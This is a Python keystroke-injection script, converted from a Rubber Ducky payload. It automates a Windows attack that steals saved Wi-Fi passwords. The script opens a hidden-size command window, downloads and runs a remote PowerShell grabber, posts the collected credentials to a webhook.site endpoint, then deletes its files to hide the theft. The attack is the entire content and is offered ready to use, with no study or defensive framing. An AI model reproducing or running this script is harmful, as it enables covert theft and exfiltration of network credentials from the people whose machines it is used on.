# Converted using ducky2python by OCEAN OF ANYTHING (https://oceanofanythingofficial.github.io/ducky2python) 
import pyautogui
import time
time.sleep(0.5)
pyautogui.hotkey("win","r")
time.sleep(0.2)
pyautogui.typewrite("cmd /k mode con: cols=15 lines=1", interval=0.02)
time.sleep(1)
pyautogui.hotkey("enter")
time.sleep(1)
pyautogui.typewrite("cd %temp%", interval=0.02)
time.sleep(0.5)
pyautogui.hotkey("enter")
time.sleep(2)
pyautogui.typewrite("curl https://cdn.jsdelivr.net/gh/oceanofanythingofficial/Wi-Fi-Password-Grabber-With-Online-Upload-Facility-With-Ducky-Script-Batch-Script-vbs-Script/Powershell-Script.ps1 -o Wi-Fi.ps1", interval=0.02)
time.sleep(1)
pyautogui.hotkey("enter")
pyautogui.typewrite("powershell -File Wi-Fi.ps1", interval=0.02)
time.sleep(1)
pyautogui.hotkey("enter")
time.sleep(2)
pyautogui.typewrite("type Wi-Fi.log > Wi-Fi.key", interval=0.02)
time.sleep(1)
pyautogui.hotkey("enter")
pyautogui.typewrite("powershell Invoke-WebRequest -Uri https://webhook.site/your-webhook-api-key -Method POST -InFile Wi-Fi.key > Wi-Fi.log", interval=0.02)
time.sleep(1)
pyautogui.hotkey("enter")
time.sleep(2)
pyautogui.typewrite("del Wi* /s/f/q", interval=0.02)
time.sleep(0.5)
pyautogui.hotkey("enter")
pyautogui.typewrite("exit", interval=0.02)
time.sleep(0.5)
pyautogui.hotkey("enter")
